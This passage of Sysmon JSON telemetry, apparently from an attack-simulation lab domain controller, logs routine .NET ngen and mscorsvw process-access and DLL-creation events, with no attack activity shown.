08:05:03.492","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010A9280B00}","TargetProcessId":"3300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6910,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.492\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010A9280B00}\r\nTargetProcessId: 3300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.492","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010A9280B00}","TargetProcessId":"3300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6911,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.507\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010A9280B00}\r\nTargetProcessId: 3300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.507","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010A9280B00}","TargetProcessId":"3300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6912,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:03.632\r\nProcessGuid: {41C8662E-222F-5F25-0000-0010A9280B00}\r\nProcessId: 3300\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ce4-0\\Microsoft.GroupPolicy.Management.Interop.dll\r\nCreationUtcTime: 2020-08-01 08:05:03.632","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:03.632","ProcessGuid":"{41C8662E-222F-5F25-0000-0010A9280B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ce4-0\\Microsoft.GroupPolicy.Management.Interop.dll","CreationUtcTime":"2020-08-01 08:05:03.632","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6913,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.648\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010102C0B00}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.648","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010102C0B00}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6914,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.648\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010102C0B00}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.648","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010102C0B00}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6915,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.648\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010102C0B00}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.648","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010102C0B00}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6916,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.679\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010E02F0B00}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.679","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010E02F0B00}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6917,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.679\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010E02F0B00}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.679","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010E02F0B00}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6918,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010E02F0B00}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 